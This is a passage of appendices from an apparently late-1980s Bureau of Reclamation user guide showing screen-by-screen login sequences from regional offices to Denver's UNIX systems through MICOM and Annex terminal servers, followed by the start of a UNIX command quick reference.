+ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + + Wait 2 seconds then PRESS (Ret) TWICE + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ³ +³ Annex Command Line Interpreter * Copyright 1988 Xylogics, Inc. ³ +³ ³ +³ ***WARNING***Unauthorized access to U.S. Government computers ³ +³ is punishable by fine and/or imprisonment. ***WARNING*** ³ +³ annex: c domax1 ³ +³ login: your username(Ret) ³ +³ Password: your password(Ret) ³ +³ UNIX System V Release ax.2.2o ns32332 ³ +³ domax1 ³ +³ Copyright (c) 1984 AT&T ³ +³ All Rights Reserved ³ +³ ***WARNING***Unauthorized access to/use of this U.S. Government ³ +³ computer is punishable by fine and/or imprisonment. ***WARNING***³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + NOTES +ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ +APPENDIX B: GREAT PLAINS LOGIN SEQUENCE + + + PRESS (Ret) + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ WARNING ****** WARNING ****** WARNING ****** WARNING ****** WARNING ³ +³ PUBLIC LAW 99-474 PROHIBITS UNAUTHORIZED USE OF THIS U.S. GOVERNMENT ³ +³ COMPUTER SYSTEM AND/OR SOFTWARE. PUNISHMENT INCLUDES FINES AND UP TO ³ +³ 10 YEARS IN PRISON. REPORT VIOLATIONS TO THE SYSTEM SECURITY OFFICER. ³ +³ WARNING ****** WARNING ****** WARNING ****** WARNING ****** WARNING ³ +³ ³ +³ ³ +³ ENTER RESOURCE A - BIL640, B - BIL751, OA - BIL630, DEN - DENVER CYBERS ³ +³ FOR STATUS OF COMPUTER SYSTEMS CALL (406) 657-6828 OR FTS 585-6828 ³ +³ FOR EMERGENCY AND AFTER HOURS CALL (406) 255-6932 ³ +³ ³ +³ CHANNEL 02/035. ENTER RESOURCE DEN(Ret) ³ +³ CONNECTED TO 02/079 ³ +³ ³ +³ WELCOME TO THE B.O.R. NETWORK P/S:B ³ +³ SYSTEMS PRESENTLY AVAILABLE ARE: ³ +³ ³ +³ **SYSTEM** **NAME** ³ +³ ³ +³ VAX 8300'S VAX ³ +³ CYBER/CDCNET F.E. CDC ³ +³ CENTER ASC ³ +³ ENCORE/UNIX MAX ³ +³ TO SELECT A SYSTEM, ENTER THE SYSTEM ³ +³ CARRIAGE RETURN AT NEXT ³ +³ PROMPT. ³ +³ ³ +³ CHANNEL 02/079. ENTER RESOURCE MAX(Ret) ³ +³ CONNECTED TO 06/025 ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + PRESS (RET) TWICE + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ³ +³ Annex Command Line Interpreter * Copyright 1988 Xylogics, Inc. ³ +³ ³ +³ ***WARNING***Unauthorized access to U.S. Government computers ³ +³ is punishable by fine and/or imprisonment. ***WARNING*** ³ +³ annex: c domax1 ³ +³ login: your username(Ret) ³ +³ Password: your password(Ret) ³ +³ UNIX System V Release ax.2.2o ns32332 ³ +³ domax1 ³ +³ Copyright (c) 1984 AT&T ³ +³ All Rights Reserved ³ +³ ***WARNING***Unauthorized access to/use of this U.S. Government ³ +³ computer is punishable by fine and/or imprisonment. ***WARNING***³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +APPENDIX C: LOWER COLORADO LOGIN SEQUENCE + + +The following operating procedures show how a user gets to Denver +using the Local Area Network (LAN) in Boulder City, starting with +the PC prompt: M:\USERNAME> + + + ENTER PCPLUS(Ret) + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ | ³ +³ COMMUNICATION SERVICES | PROCOMM PLUS ADD SERVICES MENU ³ +³ ON NETWORK | ³ +³ | ³ +³ GENERAL SPECIFIC SERVER| UP/DOWN ARROW ..Highlight Services ³ +³________________________| ³ +³ MICOM * * | ENTER ....Connect Highlighted Services³ +³ VAX_19.2 * * | ³ +³ MI24 * * | PgPd .....Scroll Up One Page ³ +³ ADMICOM * * | ³ +³ | PgPn .....Scroll Down One Page ³ +³ | ³ +³ | Home .....First Service ³ +³ | ³ +³ | End ......Last Service ³ +³ | ³ +³ | Alt-E ....Expand/Contract Services ³ +³ | ³ +³ | Alt-M ....Manual Connect ³ +³ | ³ +³ | Alt-X ....Exit PROCOMM PLUS ³ +³ | ³ +³ | Alt-Z ....Help ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + + SELECT MICOM. PRESS (Ret) SEVERAL TIMES + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ THIS IS THE LOWER COLORADO REGIONAL OFFICE INSTANET 6600 ³ +³ RESOURCES AVAILABLE ³ +³ BLD460 ³ +³ BLD732 ³ +³ BLDT50 ³ +³ DEN (1200BPS) ³ +³ DEN2 (2400BPS) ³ +³ OUTDIAL (1200 BPS) ³ +³ TELEBIT (1400 BPS OUTDIAL) ³ +³ VAX (19.2 lines only) ³ +³ CHANNEL 02/008. ENTER RESOURCE ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + ENTER DEN(Ret) + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ You are accessing the Denver MICOM through the Boulder City ³ +³ MICOM. Please remember to hit the break key three times ³ +³ after logging off. The first DISCONNECTED comes from. The ³ +³ second DISCONNECTED comes from Boulder City. This will assure³ +³ that other users can connect when you are finished. ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + + PRESS (Ret) SEVERAL TIMES + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ **SYSTEM** **NAME** ³ +³ ³ +³ VAX 8300'S VAX ³ +³ CYBER/CDCNET F.E. CDC ³ +³ ASC/CORP. CENTER ASC ³ +³ ENCORE/UNIX MAX ³ +³ ³ +³ TO SELECT A SYSTEM, ENTER THE SYSTEM ³ +³ NAME AND CARRIAGE RETURN AT NEXT ³ +³ PROMPT. ³ +³ ³ +³ CHANNEL 02/079. ENTER RESOURCE MAX(Ret) ³ +³ CONNECTED TO 06/025 ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + + PRESS (Ret) TWICE + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ³ +³ Annex Command Line Interpreter * Copyright 1988 Xylogics, Inc. ³ +³ ³ +³ ***WARNING***Unauthorized access to U.S. Government computers ³ +³ is punishable by fine and/or imprisonment. ***WARNING*** ³ +³ annex: c domax1 ³ +³ login: your username(Ret) ³ +³ Password: your password(Ret) ³ +³ UNIX System V Release ax.2.2o ns32332 ³ +³ domax1 ³ +³ Copyright (c) 1984 AT&T ³ +³ All Rights Reserved ³ +³ ***WARNING***Unauthorized access to/use of this U.S. Government ³ +³ computer is punishable by fine and/or imprisonment. ***WARNING***³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +APPENDIX D: MID-PACIFIC LOGIN SEQUENCE + + +NETWORK LOGIN PROCEDURE + + + TYPE PCOMN(Ret) + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ +³ ÚÄÄÄÄÄÄÄ´ Sacramento Connect Menu ÃÄÄÄÄÄÄÄÄÄ¿ ³ +³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³ +³ ³ ³ ³ +³ ³ ³ ³ +³ ³ 1) Connect to the Sacramento VAX 8300 (USR) ³ ³ +³ ³ ³ ³ +³ ³ 2) Connect to the Sacramento VAX 780 (CVOCO) ³ ³ +³ ³ ³ ³ +³ ³ 3) Connect to the Sacramento ENCORE ³ ³ +³ ³ ³ ³ +³ ³ 4) Connect to the Sacramento (TCP/IP) NETWORK ³ ³ +³ ³ ³ ³ +³ ³ 5) Manual Setup/Connections ³ ³ +³ ³ ³ ³ +³ ³ D) Connect to the DENVER Computers ³ ³ +³ ³ ³ ³ +³ ³ E) EXIT to DOS ³ ³ +³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + + PRESS D(Ret) + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ +³ ÚÄÄÄÄÄÄÄ´ Denver Connect Menu ÃÄÄÄÄÄÄÄÄÄ¿ ³ +³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³ +³ ³ ³ ³ +³ ³ ³ ³ +³ ³ 1) Connect to the Denver VAX 8300 (USR) ³ ³ +³ ³ ³ ³ +³ ³ 2) Connect to the Denver CYBER AA & EE ³ ³ +³ ³ ³ ³ +³ ³ 3) Connect to the Denver ENCORE ³ ³ +³ ³ ³ ³ +³ ³ 4) Connect to the Denver IBM (FFS) ³ ³ +³ ³ ³ ³ +³ ³ 5) Connect to Sacramento Computers ³ ³ +³ ³ ³ ³ +³ ³ E) EXIT to DOS ³ ³ +³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + PRESS 3(Ret) + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ hosts ³ +³ Host Name System Status Load Factor Inet Addr ³ +³ ==================================================================== ³ +³ domax0 up 0.46 137.77.1.2 ³ +³ domax1 up 1.23 137.77.1.3 ³ +³ dosun0 up 1.28 137.77.1.5 ³ +³ erc830 up 0.36 137.77.1.4 ³ +³ annex: c domax0 ³ +³ login: your username(Ret) ³ +³ Password: your password(Ret) ³ +³ UNIX System V Release ax.2.2j ns32332 ³ +³ domax0 ³ +³ Copyright (c) 1984 AT&T ³ +³ All Rights Reserved ³ +³ ***WARNING***Unauthorized access to/use of this U.S. Government ³ +³ computer is punishable by fine and/or imprisonment. ***WARNING***³ +³ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +DEDICATED LINE LOGIN + + + TYPE PCOM(Ret) + + + PRESS (Ret) + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ NAME OF RESOURCE: DEN(Ret) ³ +³ ³ +³ **SYSTEM** **NAME** ³ +³ ³ +³ VAX 8300'S VAX ³ +³ CYBER/CDCNET F.E. CDC ³ +³ ASC/CORP. CENTER ASC ³ +³ ENCORE/UNIX MAX ³ +³ ³ +³ TO SELECT A SYSTEM, ENTER THE SYSTEM ³ +³ NAME AND CARRIAGE RETURN AT NEXT ³ +³ PROMPT. ³ +³ ³ +³ CHANNEL 02/079. ENTER RESOURCE MAX(Ret) ³ +³ CONNECTED TO 06/025 ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + + PRESS (Ret) TWICE + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ³ +³ Annex Command Line Interpreter * Copyright 1988 Xylogics, Inc. ³ +³ ³ +³ ***WARNING***Unauthorized access to U.S. Government computers ³ +³ is punishable by fine and/or imprisonment. ***WARNING*** ³ +³ annex: c domax1 ³ +³ login: your username(Ret) ³ +³ Password: your password(Ret) ³ +³ UNIX System V Release ax.2.2o ns32332 ³ +³ domax1 ³ +³ Copyright (c) 1984 AT&T ³ +³ All Rights Reserved ³ +³ ***WARNING***Unauthorized access to/use of this U.S. Government ³ +³ computer is punishable by fine and/or imprisonment. ***WARNING***³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + NOTES +ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ +APPENDIX E: PACIFIC NORTHWEST LOGIN SEQUENCE + + + PRESS (Ret) OR Space Bar + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ******************************* NOTICE ******************************* ³ +³ USE OF GOVERNMENT COMPUTER RESOURCES AND DATA IS RESTRICTED TO OFFICIAL ³ +³ GOVERNMENT BUSINESS. FAILURE TO COMPLY COULD RESULT IN DISCIPLINARY ³ +³ ACTION OR PROSECUTION UNDER FEDERAL LAW. REPORT UNAUTHORIZED USE OR ³ +³ ACCESS TO THE ADP SECURITY OFFICER AT (208)334-1746 OR (FTS)554-1746. ³ +³ ³ +³ C = CYBER ³ +³ H = HYDROMET ³ +³ P = OUT DIAL ³ +³ V = VAX BOISE ³ +³ Y = YAKIMA VAX ³ +³ ³ +³ CHANNEL 02/014. ENTER RESOURCE: C(Ret) ³ +³ CONNECTED TO CHANNEL 03/094 ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + + PRESS (Ret) TWO OR THREE TIMES + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ **SYSTEM** **NAME** ³ +³ ³ +³ VAX 8300'S VAX ³ +³ CYBER/CDCNET F.E. CDC ³ +³ ASC/CORP. CENTER ASC ³ +³ ENCORE/UNIX MAX ³ +³ ³ +³ TO SELECT A SYSTEM, ENTER THE SYSTEM ³ +³ NAME AND CARRIAGE RETURN AT NEXT ³ +³ PROMPT. ³ +³ ³ +³ CHANNEL 02/079. ENTER RESOURCE MAX(Ret) ³ +³ CONNECTED TO 06/025 ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + PRESS (Ret) TWICE + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ³ +³ Annex Command Line Interpreter * Copyright 1988 Xylogics, Inc. ³ +³ ³ +³ ***WARNING***Unauthorized access to U.S. Government computers ³ +³ is punishable by fine and/or imprisonment. ***WARNING*** ³ +³ annex: c domax1 ³ +³ login: your username(Ret) ³ +³ Password: your password(Ret) ³ +³ UNIX System V Release ax.2.2o ns32332 ³ +³ domax1 ³ +³ Copyright (c) 1984 AT&T ³ +³ All Rights Reserved ³ +³ ***WARNING***Unauthorized access to/use of this U.S. Government ³ +³ computer is punishable by fine and/or imprisonment. ***WARNING***³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +APPENDIX F: UPPER COLORADO LOGIN SEQUENCE + + + PRESS (Ret) + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ Server> C MICOM2400(Ret) ³ +³ Server -010- Session 1 connected. ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + + PRESS (Ret) + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ SLC PORT SELECTOR ³ +³ CHANNEL 01/091. ENTER HOST: DEN(Ret) ³ +³ CONNECTED TO 01/014. ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + + PRESS (Ret) TWO OR THREE TIMES + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ **SYSTEM** **NAME** ³ +³ ³ +³ VAX 8300'S VAX ³ +³ CYBER/CDCNET F.E. CDC ³ +³ ASC/CORP. CENTER ASC ³ +³ ENCORE/UNIX MAX ³ +³ ³ +³ TO SELECT A SYSTEM, ENTER THE SYSTEM ³ +³ NAME AND CARRIAGE RETURN AT NEXT ³ +³ PROMPT. ³ +³ ³ +³ CHANNEL 02/079. ENTER RESOURCE MAX(Ret) ³ +³ CONNECTED TO 06/025 ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + PRESS (Ret) TWICE + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ³ +³ Annex Command Line Interpreter * Copyright 1988 Xylogics, Inc. ³ +³ ³ +³ ***WARNING***Unauthorized access to U.S. Government computers ³ +³ is punishable by fine and/or imprisonment. ***WARNING*** ³ +³ annex: c domax1 ³ +³ login: your username(Ret) ³ +³ Password: your password(Ret) ³ +³ UNIX System V Release ax.2.2o ns32332 ³ +³ domax1 ³ +³ Copyright (c) 1984 AT&T ³ +³ All Rights Reserved ³ +³ ***WARNING***Unauthorized access to/use of this U.S. Government ³ +³ computer is punishable by fine and/or imprisonment. ***WARNING***³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +APPENDIX G: WASHINGTON OFFICE LOGIN SEQUENCE + + + PRESS Space Bar ONCE OR TWICE + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ CONNECTED TO 01/044 ³ +³ WELCOME TO THE B.O.R. NETWORK P/S:C ³ +³ SYSTEMS PRESENTLY AVAILABLE ARE: ³ +³ ³ +³ **SYSTEM** **NAME** ³ +³ ³ +³ CYBER SYSTEMS ³ +³ (AA OR EE) ³ +³ VAX CLUSTER DEN ³ +³ ³ +³ OUT-DIAL MODEM OD ³ +³ ³ +³ TO SELECT A SYSTEM,ENTER THE SYSTEM ³ +³ NAME AND CARRIAGE-RETURN AT NEXT ³ +³ PROMPT. ³ +³ ³ +³ CHANNEL 02/026. ENTER RESOURCE DEN(Ret) ³ +³ CONNECTED TO 01/051 ³ +³ ³ +³ **SYSTEM** **NAME** ³ +³ ³ +³ VAX 8300'S VAX ³ +³ CYBER/CDCNET F.E. CDC ³ +³ ASC/CORP. CENTER ASC ³ +³ ENCORE/UNIX MAX ³ +³ ³ +³ TO SELECT A SYSTEM, ENTER THE SYSTEM ³ +³ NAME AND CARRIAGE RETURN AT NEXT ³ +³ PROMPT. ³ +³ ³ +³ CHANNEL 02/079. ENTER RESOURCE MAX(Ret) ³ +³ CONNECTED TO 06/025 ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + PRESS (Ret) TWICE + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ³ +³ Annex Command Line Interpreter * Copyright 1988 Xylogics, Inc. ³ +³ ³ +³ ***WARNING***Unauthorized access to U.S. Government computers ³ +³ is punishable by fine and/or imprisonment. ***WARNING*** ³ +³ annex: c domax1 ³ +³ login: your username(Ret) ³ +³ Password: your password(Ret) ³ +³ UNIX System V Release ax.2.2o ns32332 ³ +³ domax1 ³ +³ Copyright (c) 1984 AT&T ³ +³ All Rights Reserved ³ +³ ***WARNING***Unauthorized access to/use of this U.S. Government ³ +³ computer is punishable by fine and/or imprisonment. ***WARNING***³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +APPENDIX H: UNIX COMMANDS QUICK REFERENCE + + + +a > b put the output of command a into + file b + +a >> b append the output of command a onto + file b + +a < b take the input of command a from + file b + +a | c pipe the output of command a to the + input of command c + +a & run command a in the background + +assist call up the assist menu for + information on UMAX commands + +at time < script run script at time + +at -l list your at jobs waiting to be + executed + +at -r xx remove at job xx + 